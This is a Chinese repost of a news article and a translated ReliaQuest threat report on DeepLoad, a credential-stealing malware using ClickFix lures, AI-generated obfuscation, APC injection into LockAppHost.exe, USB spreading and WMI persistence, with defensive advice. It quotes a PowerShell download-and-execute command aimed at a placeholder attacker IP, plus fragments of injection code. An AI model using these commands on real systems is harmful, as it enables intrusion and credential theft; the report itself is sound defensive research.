文章总结： Reliaquest披露新型恶意软件Deepload利用AI生成数千行干扰代码实现免杀，通过ClickFix社会工程学投递，在Windows锁屏进程中注入载荷并窃取凭证。该恶意软件具备U盘传播能力，并通过WMI事件订阅实现持久化，即便清理后仍可三天后再次感染。建议采用行为检测、启用PowerShell脚本块日志、审计WMI订阅并轮换凭据进行防御。 综合评分： 85 文章分类： 恶意软件,免杀,应急响应,终端安全,威胁情报

---

研究人员称：全程使用 AI窃取凭证，实现免杀

原创

cyberscoop cyberscoop

安全行者老霍

2026年4月22日 09:00 北京

在小说阅读器读本章

去阅读

作者：DEREK B. JOHNSON

发布时间：2026 年 3 月 30 日

#

据网络安全公司 ReliaQuest 披露，新型恶意软件 DeepLoad可记录键盘按键，在 AI 生成代码中隐藏细节，并在被拦截数日后再次感染主机。

一场全新的基于恶意软件的凭证窃取攻击活动已开始入侵企业 IT 环境，研究人员将其命名为 DeepLoad。

在周一发布的报告中，ReliaQuest AI 研究人员Thassanai McCabe与Andrew Currie指出，此次攻击最关键的特征，是其运用人工智能及其他工程化手段 “突破大多数企业依赖的安全控制，将一次用户误操作转化为持久化的凭证窃取权限”。

DeepLoad 通过名为 “QuickFix” 的社会工程学手段投递至受害者设备，例如伪造的浏览器弹窗或错误页面。一旦用户中招，恶意软件开发者 — 更有可能是其使用的 AI 工具 — 便在攻击链的每一个环节精心构建对抗安全设备的免杀机制。

该加载器将功能性代码 “掩埋在数千行无意义的变量赋值语句之下”，并且恶意载荷会依托 Windows 锁屏进程运行，而该进程通常会被威胁监控类安全工具忽略。ReliaQuest 表示，如此大规模的代码填充几乎不可能仅靠人工完成。

“我们高度确信，AI 被用于构建这层混淆保护层，” McCabe与Currie写道，“如果属实，企业将面临该恶意软件的频繁更新，防御方在多轮攻击之间调整检测规则的时间会被大幅压缩。”

DeepLoad 可通过实时键盘记录窃取凭证；即便安全团队拦截了初始加载器，它也能通过备份机制实现持久化驻留。

“在我们调查的事件中，该加载器会感染已连接的 U 盘，这意味着最初受感染的主机很可能并非唯一受害系统，” McCabe与Andrew表示，“即便完成清理，标准修复流程未能清除的隐藏持久化机制仍会在三天后重新发动攻击。”

ReliaQuest 的研究进一步证明，在过去一年中，部分传统静态网络安全手段 — 例如基于恶意软件特征码或文件特征的检索正迅速失效，因为 AI 模型可以生成特征完全唯一、无限变种的攻击工具。

谷歌、Anthropic 等机构已多次发出警告：AI 赋能的网络攻击正在大幅压缩防御方对入侵事件的响应时间。

在今年旧金山举办的 RSA 大会上，专家向科技安全媒体 CyberScoop 表示，未来两年将形成对 AI 驱动攻击方有利的 “完美风暴”– 网络犯罪分子与国家级攻击者运用技术的速度和规模，将远超防御方的迭代速度。

McCabe与Andrew认为，攻击者可能持续利用 AI 规避静态分析监控，这意味着防御方必须转向关注其他入侵指标。

“基于我们的观察，企业必须优先采用行为检测与运行时检测，而非基于文件的扫描，才能及早发现此类（及类似）攻击活动。”

#

DeepLoad 恶意软件将 ClickFix 投递与 AI 生成规避技术配合使用

#

核心要点

“DeepLoad” 恶意软件通过 “ClickFix” 投递方式侵入企业环境，仅需用户一次操作，即可快速实现无文件感染。

该恶意软件疑似采用人工智能辅助混淆与进程注入技术规避静态扫描；同时立即启动凭据窃取行为，即便主加载器被拦截，仍可捕获密码与会话信息。

此次攻击活动借助Windows WMI事件订阅实现持久化驻留，可在主机看似清理干净三天后再次感染。

针对 DeepLoad，建议启用 PowerShell 脚本块日志记录功能，对暴露主机的 WMI 订阅项开展审计，并轮换感染窗口期内的所有凭据。

ReliaQuest 已在企业环境中监测到新型 “DeepLoad” 恶意软件利用。该攻击活动的突出特点并非某项单一技术，而是整条攻击链经过精心设计，能够突破绝大多数组织依赖的安全控制措施，仅通过用户一次操作即可实现持久化凭据窃取访问。

本报告提供 DeepLoad 完整攻击链分析，表明新兴威胁可在出现时即具备成熟的作战能力。基于观测结果，组织必须优先采用基于行为、运行时检测机制 — 而非基于文件的扫描 — 才能及早发现此类攻击活动（及同类威胁）。

DeepLoad 通过 “ClickFix”（一种诱骗用户在本机执行恶意命令的社会工程技术）投递，在每个阶段均具备规避能力。加载器将功能代码隐藏在数千条无意义变量赋值语句之下，使基于文件的扫描工具无特征可标记；有效载荷则运行在 Windows 锁屏进程内部，该进程因常被安全工具忽视而被攻击者选中。我们高度确信，人工智能被用于构建该混淆层。若果真如此，组织应预计该恶意软件会频繁更新，在各攻击波次之间留给防御方调整检测规则的时间将更短。

业务风险非常紧急。DeepLoad 可在用户输入凭据时实时捕获（而非仅从存储文件中提取），即便初始加载器被检测并拦截，仍可继续运行。在我们调查的事件中，加载器会向已连接的 U 盘扩散，这意味着初始受感染主机通常并非唯一受影响系统。即便完成清理，标准修复流程未处理的隐藏持久化机制仍会在三天后重新触发攻击。

继续阅读，了解：

• 单次用户操作如何使攻击者获得无需后续交互、可跨重启存活的持久化访问权限；
• 恶意软件为何隐藏在 Windows 锁屏进程中，以及这对检测工作意味着什么；
• 主机看似已完成修复，却能在数日后自行再次感染的原因。

1. 从点击到沦陷：DeepLoad 如何建立立足点

DeepLoad 仅需用户单次操作即可快速获得持久化访问权限，速度足以快过人工响应，因此关键在于识别明显恶意软件落地磁盘之前的各环节行为传递。下文将分析从初始投递到可突破清理机制的立足点建立全过程。

1.1. ClickFix 打开持久化大门

DeepLoad 攻击链始于 ClickFix 投递。ClickFix 是一种社会工程技术，诱使用户自行执行攻击者命令。该技术通常通过伪造浏览器弹窗或带有逼真 “错误” 提示的钓鱼页面投递，指示用户将命令粘贴至 Windows “运行” 或终端以 “修复” 问题。命令执行后，将直接拉取并执行有效载荷，示例如下：

| | | — | | powershell.exe -ep Bypass -Command "iex(irm hxxp://<恶意IP地址>:3015/index)" |

在本次攻击活动中，仅这一条命令即可通过创建计划任务实现持久化、重启后仍然可以访问，该任务会反复重新执行加载器。随后，合法 Windows 工具 mshta.exe（常被滥用于远程脚本执行）连接攻击者跳板基础设施，下载经过混淆的 PowerShell 加载器。

攻击基础设施几乎可确定为专门搭建。各事件中观测到的跳板域名均在 22 分钟内开始提供恶意内容，使仍依赖人工研判与处置的安全团队处于显著劣势。

ClickFix 在投递阶段难以拦截，但后续行为具备可检测性。通过监控异常的 mshta.exe 出站连接、新建计划任务以及带执行策略绕过参数启动的 PowerShell，可及早发现此类活动。

1.2. AI 生成干扰码绕过静态扫描

DeepLoad 的 PowerShell 加载器疑似通过在真实逻辑外包裹数千条无意义变量赋值（看似常规脚本）的方式，使静态检测机制过载。脚本看似 “内容繁杂”，但绝大部分均为干扰信息。

其中一例为代码中嵌入对 windowsupdate.microsoft [.] com 的引用（见下例）。该行为并非真实网络通信。在 PowerShell 中，${…} 内的文本被视为变量名；此处域名仅为填充内容，用于迷惑人工审查与自动化扫描工具。

| | | — | | {Get-AuthenticodeSignature -InformationAction Continue -TaskPath \Microsoft\Windows\ && (aaa)} = "ZnVuY3"; {Get-StoragePool -ErrorAction Stop -Uri windowsupdate.microsoft.com && (kebnn)} = "Rpb24gR2V0LUNv"; |

功能代码体量极小且位于还原代码末尾：一段简短的异或（XOR）逻辑，使用硬编码密钥解密内存中的 Shellcode 容器（见解密逻辑）。解码后的有效载荷从不写入磁盘，使依赖恶意特征文件匹配的基于文件安全工具无迹可寻。

| | | — | | $GelioSystem=@" "\xe8\x9b\xd5\x01\x00\x00\x90\x03\x00\x12..." "\xa9\xc9\xff\xbd\x94\x12\xac\x22\x8d\xee..." "@ |

如此大规模填充代码基本可排除人工编写可能。虽不排除模板化工具生成，但观测到的代码质量与一致性更指向人工智能生成。若果真如此，原本需数日完成的工作如今可在半天内完成。人工智能甚至可能不仅编写干扰代码，还参与了攻击逻辑本身的编写。

数据规模也决定了静态检测在此场景下完全失效：干扰信息过多难以筛选。最可靠的控制措施为启用 PowerShell 脚本块日志记录，该功能可捕获 PowerShell 运行时执行的解码命令，直接穿透所有填充干扰。

但投递环节仅为问题的一半。恶意软件运行后，仍需要藏身之处。

2. DeepLoad 为何隐藏在锁屏进程中

DeepLoad 设计目标为融入可信 Windows 活动，使终端入侵更难被发现、更难彻底清除，即便在 “成功清理” 后亦是如此。通过 ClickFix 获得初始访问权限后，DeepLoad 将有效载荷隐藏在 LockAppHost.exe– 管理 Windows 锁屏的合法系统进程 — 内部。该选择极有可能是刻意为之，因 LockAppHost.exe 通常不会发起出站网络活动，任何连接行为均应触发告警。然而，绝大多数安全工具并未对其设置监控。

2.1 内存中构建注入器

为规避基于文件的检测，DeepLoad 利用 PowerShell 内置功能 Add-Type 即时编译并运行 C# 代码，生成二次组件。该过程会在用户 Temp 目录释放一个临时动态链接库（DLL）文件。

由于 DLL 每次执行均重新编译且文件名随机，基于特征的安全工具无匹配特征，针对特定文件名的检测规则基本不会触发。行为检测与内存扫描仍有可能发现，但难度显著提升。

加载器还会通过禁用 PowerShell 命令历史、直接调用 Windows 核心函数而非依赖 PowerShell 内置命令的方式清除自身痕迹，悄然绕过最常见的监控钩子。

| | | — | | [DllImport("kernel32.dll")] public static extern bool CreateProcessA(...); [DllImport("kernel32.dll")] public static extern bool WriteProcessMemory(...); |

用于启动进程与修改内存的原生 Windows API 调用

2.2. 进程选择与 APC 注入

DeepLoad 随后选择可使其融入正常操作系统行为的 Windows 进程，降低活动与正常系统行为的区分度。程序会检查包含三个候选进程的硬编码列表（见下例）：LockAppHost.exe、makecab.exe 与 Magnify.exe。在受调查主机中，DeepLoad 选中安全团队极少关注的 Windows 锁屏进程 LockAppHost.exe。

| | | — | | string[] possiblePaths = { @"C:\Windows\System32\LockAppHost.exe", @"C:\Windows\System32\makecab.exe", @"C:\Windows\System32\Magnify.exe" }; |

DeepLoad 采用异步过程调用（APC）注入技术：注入器以挂起状态启动目标进程，向其内存写入 Shellcode，再通过 QueueUserAPC 函数在进程恢复时触发执行。最终结果为活跃的 DeepLoad 有效载荷运行在可信 Windows 进程内部，且解码载荷未写入磁盘。

检测 APC 注入需监控未签名或异常进程发起的 QueueUserAPC 调用，以及异常的父子进程关系（例如由 PowerShell 编译注入器启动 LockAppHost.exe，是防御方可监控的关键痕迹）。

3. 凭据窃取与浏览器劫持

DeepLoad 在入侵成功后立即窃取凭据，因此即便实现部分隔离，仍可能导致密码、会话与活跃账户泄露。

主攻击链完成前，独立凭据窃取程序 filemanager.exe 已在攻击者基础设施上独立运行，即便主加载器被检测拦截，仍可外泄数据。filemanager.exe 这一名称极有可能是刻意选择，在进程列表中看似无害的系统工具，极易在研判过程中被忽略。

DeepLoad 还会释放并注册恶意浏览器扩展，实时捕获用户输入的凭据，并在每次浏览器会话中持续生效，直至被手动移除。两条凭据窃取路径叠加放大了风险：

• 存储凭据抓取：直接从主机提取浏览器保存的密码；
• 恶意浏览器扩展：劫持用户全部操作，使活跃登录状态、打开标签页、会话令牌与保存密码均面临泄露风险。

DeepLoad 将凭据窃取模块与攻击链其他部分分离。filemanager.exe 使用独立命令与控制（C2）通道并配备备用域名，因此拦截主加载器无法阻止凭据外泄。防御方应审计受影响终端的已安装浏览器扩展，在恢复系统使用前移除所有非标准部署路径或未经 IT 注册的扩展。

3.1. U 盘扩散超出初始主机范围

在本次调查的攻击活动中，DeepLoad 通过 U 盘扩散，因此隔离处置应假定存在多台受影响终端。我们已直接观测到该行为，但暂无法确定 U 盘传播是内置功能还是攻击者额外叠加的能力。

相关迹象出现较早：初始感染十分钟内，攻击者基础设施流量中出现 /t1_usb 路径，表明 C2 后端会单独跟踪 U 盘活动。

当 U 盘接入受感染主机时，自动执行以下流程：

• cmd.exe 与 mshta.exe 成对快速重复执行 — 与加载链全程使用的组合一致；
• 单次操作向 U 盘写入超过 40 个文件，旨在最大化其他主机用户点击运行的概率；
• 文件伪装为常见安装程序：ChromeSetup.lnk、Firefox Installer.lnk、AnyDesk.lnk 及 Windows 安装程序仿制品 — 均为快捷方式文件，双击即可重新触发完整感染流程。

一小时后，另一台主机出现第二次复制行为，表明恶意软件在新 U 盘接入时会自动重复该操作。

防御方应将所有接入受感染主机的可移动介质视为已被污染，在重新使用前完成审计，并将隔离范围扩大至初始识别主机之外。

3.2. 常规清理遗漏隐藏 WMI 持久化

标准终端清理措施对此类攻击效果有限；DeepLoad 利用 Windows 管理规范（WMI）使 “已清理” 主机在无用户操作、无攻击者干预的情况下三天后再次感染。WMI 实现两大作用：打断绝大多数检测规则依赖的父子进程链，同时创建 WMI 事件订阅，在后续静默重新执行攻击。

修复过程中，标准痕迹（计划任务、临时文件及其他基于文件的特征）均被清除，但 WMI 订阅项未被处理。WMI 订阅项存储在独立仓库中，绝大多数清理流程不会检查，且不在磁盘留存文件，因此主机可通过常规清理但仍具备再次感染条件。三天后，存活的订阅项触发执行，将 filemanager.exe 重新释放至用户下载文件夹。

在任何受感染主机恢复生产环境前，安全团队必须显式枚举 WMI 事件订阅项，移除所有无法关联至已知合法来源的条目。该步骤通常未包含在标准修复清单中，必须手动补充。

4. 升级防御体系应对 DeepLoad

4.1 ReliaQuest 解决方案

DeepLoad 通过高度无文件化运行、融入可信 Windows 进程及快速执行实现基于文件防御的规避。ReliaQuest GreyMatter 帮助安全团队及早发现此类行为，在凭据窃取与扩散扩大影响范围前完成隔离。

GreyMatter Transit 在基于文件扫描失效的场景提供可见性。由于 DeepLoad 解码后的有效载荷从不写入磁盘，基于特征的工具无检测目标。GreyMatter Transit 对网络流量实时监控，可将 mshta.exe 回连攻击者控制的跳板基础设施、filemanager.exe 通过独立 C2 通道通信及 U 盘相关 /t1_usb 流量作为行为特征识别。

GreyMatter Agentic AI 聚焦攻击链全周期行为而非单一信号。在本次事件中，WmiPrvSE.exe 启动的 PowerShell 会话、LockAppHost.exe 异常活动及浏览器扩展文件写入非标准路径，单独看均为低置信度事件，但关联后可明确指向活跃入侵行为。

ReliaQuest 检测规则依托最新威胁情报与研究成果持续更新，确保组织有效抵御 DeepLoad 的规避技术，包括人工智能生成与无文件有效载荷执行。

通过部署以下 GreyMatter 自动化响应剧本，组织可将威胁平均处置时间（MTTC）从小时级压缩至分钟级，缩小凭据窃取与横向扩散窗口：

• 隔离终端

立即将受感染主机断开网络，切断 C2 通信并限制 U 盘驱动的横向移动；

• 终止会话

使凭据失效并结束活跃会话，降低 filemanager.exe 通过存储凭据抓取与实时浏览器劫持造成的暴露风险；

• 禁用用户

停用受感染账户，阻止未授权操作 —— 在保存密码与活跃会话令牌均已泄露的场景下至关重要。

4.2 落地行动方案

DeepLoad 可在单次会话内完成从初始投递到持久化凭据窃取的全过程，因此防御措施必须适配攻击速度、无文件执行特性及可突破 “标准” 清理的持久化机制。以下建议针对传统控制措施常遗留的防护缺口：

1. 在日常安全运营中增加 WMI 订阅项审计WMI 事件订阅项不在常规痕迹范围内，需显式枚举。在本次攻击活动中，存活的订阅项在主机看似清理完成三天后重新触发攻击链。
2. 立即启用终端行为监控基于文件的扫描无法发现该加载器。优先启用 PowerShell 脚本块日志记录与可捕获行为及内存活动的 EDR 遥测，及早发现内存执行与进程注入行为。
3. 轮换受感染主机所有凭据filemanager.exe 同时访问浏览器存储凭据与实时会话。将所有受感染主机可访问的凭据视为已泄露并完成轮换 —— 包括保存密码、会话令牌及感染窗口期内的所有活跃账户。

5. 核心总结与后续趋势

随着防御方补齐防护缺口，DeepLoad 将持续迭代，因此检测能力必须基于行为、具备稳定性并支持快速更新。我们预计凭据窃取组件将率先演进：随着浏览器密码轮换成为常规操作，filemanager.exe 可能将目标扩展至 Windows 凭据管理器、密码管理器及多因素认证令牌。

人工智能生成特征表明，混淆逻辑未来极有可能从通用干扰码进化为针对特定部署环境定制的填充代码，使行为基线建立难度进一步提升。随着 WMI 订阅项被纳入修复清单，持久化机制很可能转向当前关注度较低的其他合法 Windows 功能。

三条可立即执行的方法:

1. WMI 持久化需专项修复步骤仅清除基于文件的痕迹并不足够，必须单独枚举并移除订阅项，否则攻击链可在其他方面看似干净的主机上重新执行。GreyMatter Agentic AI 可将 WMI 订阅项活动作为行为关联的一部分，结合完整攻击链进行告警，而非孤立呈现。
2. 运行时行为可见性是唯一可靠检测层基于文件的扫描基本无法发现该加载器。PowerShell 脚本块日志记录与终端行为遥测是最有效的发现手段，且随着人工智能使变种生成成本降低，这一趋势将持续成立。
3. 检测能力必须超越特定特征DeepLoad 的注入目标会随关注度提升而轮换。ReliaQuest 围绕攻击者底层行为构建规则，而非绑定特定进程名，确保在威胁迭代过程中检测能力持续有效。

Researchers say credential-stealing campaign used AI to build evasion ‘at every stage’

https://reliaquest.com/blog/threat-spotlight-deepload-malware-pairs-clickfix-delivery-with-ai-generated-evasion/

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全行者老霍 cyberscoop cyberscoop《研究人员称：全程使用 AI窃取凭证，实现免杀》